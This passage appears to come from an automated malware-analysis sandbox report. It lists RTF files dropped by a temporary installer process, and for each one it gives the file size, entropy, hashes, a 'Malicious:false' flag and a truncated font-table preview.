                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 020206030504050203
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):44558
                                                                                                                                                                                                                                                          Entropy (8bit):5.049062407758663
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2aFknOj9rcGSOzlD0gl+0j3akipVsc5NcTF4BaVy3F1+1h1r1KDZ/6A9L:2amAhcWF4BaA3F1+1h1r1KDIA9L
                                                                                                                                                                                                                                                          MD5:16036186160BEB81F13561AE51DCFBED
                                                                                                                                                                                                                                                          SHA1:BB644BD11DABCC9F453A71745D7CF12A1621FEBA
                                                                                                                                                                                                                                                          SHA-256:AE0674BF9ECDCD8A1550E0ECA0529EED66E9786B6029AE6EB5414769205FDAA2
                                                                                                                                                                                                                                                          SHA-512:CEDAD90055D3DE40A431B0FF9FA89D9E2A25E831EC484854F01E04CC953EBBD50D76B23107C5D1446145A4596A721EEBB34B6EFF827C623D894924BEB64B8DA2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 020206030504050203
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):39483
                                                                                                                                                                                                                                                          Entropy (8bit):5.037147955886456
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:2aFkyWNdW2OTYn/akrOc7jgskl7rVGGASZqeY4sMQi1OkBSyAQdAMeo75Y3kpTBd:2aFknOc7cskl/VGGAS0MDAJZ/6A9S
                                                                                                                                                                                                                                                          MD5:2A08EEECD3328F25905421850E9182BE
                                                                                                                                                                                                                                                          SHA1:EC931D459DAD71B222442AA00412E1E627F343E2
                                                                                                                                                                                                                                                          SHA-256:F7F40C10AE7B09FB3D476FCEA2E2FC7CCA8DF57EE92899A1675B4A1B7D61749D
                                                                                                                                                                                                                                                          SHA-512:D1F92F97F9B9F560A0FC510567A63B8A150759DCE4E25F0AA7B302537E3745FFA9722C144D1FF09308E7F131E92AD1CD5CB91C21B21ECE8B62E7A90B85911C10
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 020206030504050203
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):46380
                                                                                                                                                                                                                                                          Entropy (8bit):5.030428428463447
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqegxdU6T2njX8x3TLjwUtqYepr+pNINnNINGNAAlTuARAhyzc1TOCgX03w3n30j:qqHLIA9R
                                                                                                                                                                                                                                                          MD5:E7F852CDF6B14E79DB92EF3A563FFE70
                                                                                                                                                                                                                                                          SHA1:CEAD99D6CA825878A9040D0F05C04D34DCB48B3F
                                                                                                                                                                                                                                                          SHA-256:C5F6E6F3BEB1F933033207BA5217B357F1257671A5DB08AC5D6E1C484AFF5744
                                                                                                                                                                                                                                                          SHA-512:0F259C1081D3932B0DCA526CE090C3EDEA9C8B40DFE71649F6EED6F948F2FBFE9266C0531BEF728F15ED5969CCC1FE9710EA44903BB2CF49FBD8BA531EBC3D2E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\f
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):37249
                                                                                                                                                                                                                                                          Entropy (8bit):5.028034136812006
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:q4eoxdUjOcPI0QhhiLVutRNQf6zgOG4h/PWvFmZ/6A9D:q4V7UneIA9D
                                                                                                                                                                                                                                                          MD5:0A48D352EE09C07B7AFC4D8FCA754602
                                                                                                                                                                                                                                                          SHA1:A8EF06010F383B0E1DF2C56ABC44E3C28752D99B
                                                                                                                                                                                                                                                          SHA-256:36765A4404110CDE20DBDD48BFB5C7550F38FCD80312627D2465234990A146D2
                                                                                                                                                                                                                                                          SHA-512:5886EF5B32E3619BBCEA35A29332B9EB8BB7E05D2A34C7E9591756E391AC8710886AA52A9A4EF87227F58FE54109EFB3526B905AA1ED75ED93BC3ED7D6EAF871
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):38736
                                                                                                                                                                                                                                                          Entropy (8bit):5.026744300506052
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:q4eM4jXpT2njX8x3frTlkCR9vIFfT5ebEgTRg+oQHMciZ/6A96:q4U16IA96
                                                                                                                                                                                                                                                          MD5:F53987E38EB6461218A046384275D858
                                                                                                                                                                                                                                                          SHA1:F7D0C00DC80411F7ABF389AF5597F6A9D76671CA
                                                                                                                                                                                                                                                          SHA-256:E2F7132583F6483F598B1D587B4837EA60A4E8147602AB48F72C821FB65CDA64
                                                                                                                                                                                                                                                          SHA-512:23C0AA0AA555D0D04E384320F8682A4AD4511412A854A819C6345F34613039328D5A880B57E0A40DCABDB90F0E324BE03EBA4696F3D93DF96441CF631E01F1CA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):36597
                                                                                                                                                                                                                                                          Entropy (8bit):5.030646060695953
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:q4FkNx1ETicPI0QhhiLV9E8cvtsomvimZ/6A9Q:q4GVUnXIA9Q
                                                                                                                                                                                                                                                          MD5:4C157CB3C17D248D1CE74DB9A506CBBC
                                                                                                                                                                                                                                                          SHA1:E8786D856D7F9A33E841A2C4BDF4BA41E8153448
                                                                                                                                                                                                                                                          SHA-256:78E2AD2864EE4FA19DF5149FA7C86F4937FECDC48B0AC7965B9332706A356F87
                                                                                                                                                                                                                                                          SHA-512:BA3C0F19E6B41C82021B4B0A00D9177F44D9341C5F26226258AEAC93DD46622C55C50ED284F5B8CD6DEBAF52C35B55720732C0FF9D86961E55648E2182D358DC
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):96477
                                                                                                                                                                                                                                                          Entropy (8bit):4.924667312566969
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:q4FkIxd/+zl3C79ka9aT2njX8x3fj5g5V5V5h5G5P5N585gVVhGPN9turfTYlD+N:q4pfLS7tFvIA9AA
                                                                                                                                                                                                                                                          MD5:474EFD092A23625D32003FF87FF3453A
                                                                                                                                                                                                                                                          SHA1:1BD49C74CD6DC150858759546E8C8B7A49F12288
                                                                                                                                                                                                                                                          SHA-256:8AEAD04008796E39C04E7E0F99B5824387C416B5C2A0EFF01A9FE5881959F382
                                                                                                                                                                                                                                                          SHA-512:3BED2B0372293ECDF4798D223917556E358EF8AB686D53519EAF6310329FF4B89FB26FA08F42A77D2B16C2065218B9EE746D9D126683CEA19ADAF83172895127
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):39892
                                                                                                                                                                                                                                                          Entropy (8bit):5.034602521621446
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:2aFkyWNdW2OTYn/akrOc7jgskl7rVGG1ZoQZq4sMQi1y9k1IKWhlmdBMyiX4+0Aw:2aFknOc7cskl/VGG1iMN+0dZ/6A9v
                                                                                                                                                                                                                                                          MD5:D947033057D3BCAF28277A8071817DB8
                                                                                                                                                                                                                                                          SHA1:901824B565296E552D80E934D8A2F39369611F86
                                                                                                                                                                                                                                                          SHA-256:B8A385017A5AD17D0584EB61350466CD453CA521B282F195CA0AF0971621BFB2
                                                                                                                                                                                                                                                          SHA-512:92ACB02795C228F72BF64ED33A55B6DB6D4222786B32FA0A67A6A55D53F6D851BC6659CCA4341FDECD6BF0B48E5CAC7D1A437A26927F790A57436C5AAFA1877B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 020206030504050203
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):38736
                                                                                                                                                                                                                                                          Entropy (8bit):5.026744300506052
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:q4eM4jXpT2njX8x3frTlkCR9vIFfT5ebEgTRg+oQHMciZ/6A96:q4U16IA96
                                                                                                                                                                                                                                                          MD5:F53987E38EB6461218A046384275D858
                                                                                                                                                                                                                                                          SHA1:F7D0C00DC80411F7ABF389AF5597F6A9D76671CA
                                                                                                                                                                                                                                                          SHA-256:E2F7132583F6483F598B1D587B4837EA60A4E8147602AB48F72C821FB65CDA64
                                                                                                                                                                                                                                                          SHA-512:23C0AA0AA555D0D04E384320F8682A4AD4511412A854A819C6345F34613039328D5A880B57E0A40DCABDB90F0E324BE03EBA4696F3D93DF96441CF631E01F1CA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):66194
                                                                                                                                                                                                                                                          Entropy (8bit):4.972115474061052
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:q4Fkex1eiCUYvmpNM2UrPGsGx7TYlDidldgOQrrFlEoIeRWeWyWVWAWJHZIWRWe0:q4vsLIA9i
                                                                                                                                                                                                                                                          MD5:6181F9D5B81EC15F49F57FCFABF69562
                                                                                                                                                                                                                                                          SHA1:451D5FBDF90E8CD153DC5990092613901D084CD1
                                                                                                                                                                                                                                                          SHA-256:442E6A351381A56F912F0A68036C868F60D45117C92C9C2225948AC614DF7416
                                                                                                                                                                                                                                                          SHA-512:5F5C61E9995C9081CFC0F97E857B5D67E45A1A6FD0796927AE694E25E41A50129E1952B19CF9A40A325A23137732465A718B1282C23688093160A0FF604BB124
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):37249
                                                                                                                                                                                                                                                          Entropy (8bit):5.028034136812006
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:q4eoxdUjOcPI0QhhiLVutRNQf6zgOG4h/PWvFmZ/6A9D:q4V7UneIA9D
                                                                                                                                                                                                                                                          MD5:0A48D352EE09C07B7AFC4D8FCA754602
                                                                                                                                                                                                                                                          SHA1:A8EF06010F383B0E1DF2C56ABC44E3C28752D99B
                                                                                                                                                                                                                                                          SHA-256:36765A4404110CDE20DBDD48BFB5C7550F38FCD80312627D2465234990A146D2
                                                                                                                                                                                                                                                          SHA-512:5886EF5B32E3619BBCEA35A29332B9EB8BB7E05D2A34C7E9591756E391AC8710886AA52A9A4EF87227F58FE54109EFB3526B905AA1ED75ED93BC3ED7D6EAF871
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):46380
                                                                                                                                                                                                                                                          Entropy (8bit):5.030428428463447
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqegxdU6T2njX8x3TLjwUtqYepr+pNINnNINGNAAlTuARAhyzc1TOCgX03w3n30j:qqHLIA9R
                                                                                                                                                                                                                                                          MD5:E7F852CDF6B14E79DB92EF3A563FFE70
                                                                                                                                                                                                                                                          SHA1:CEAD99D6CA825878A9040D0F05C04D34DCB48B3F
                                                                                                                                                                                                                                                          SHA-256:C5F6E6F3BEB1F933033207BA5217B357F1257671A5DB08AC5D6E1C484AFF5744
                                                                                                                                                                                                                                                          SHA-512:0F259C1081D3932B0DCA526CE090C3EDEA9C8B40DFE71649F6EED6F948F2FBFE9266C0531BEF728F15ED5969CCC1FE9710EA44903BB2CF49FBD8BA531EBC3D2E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
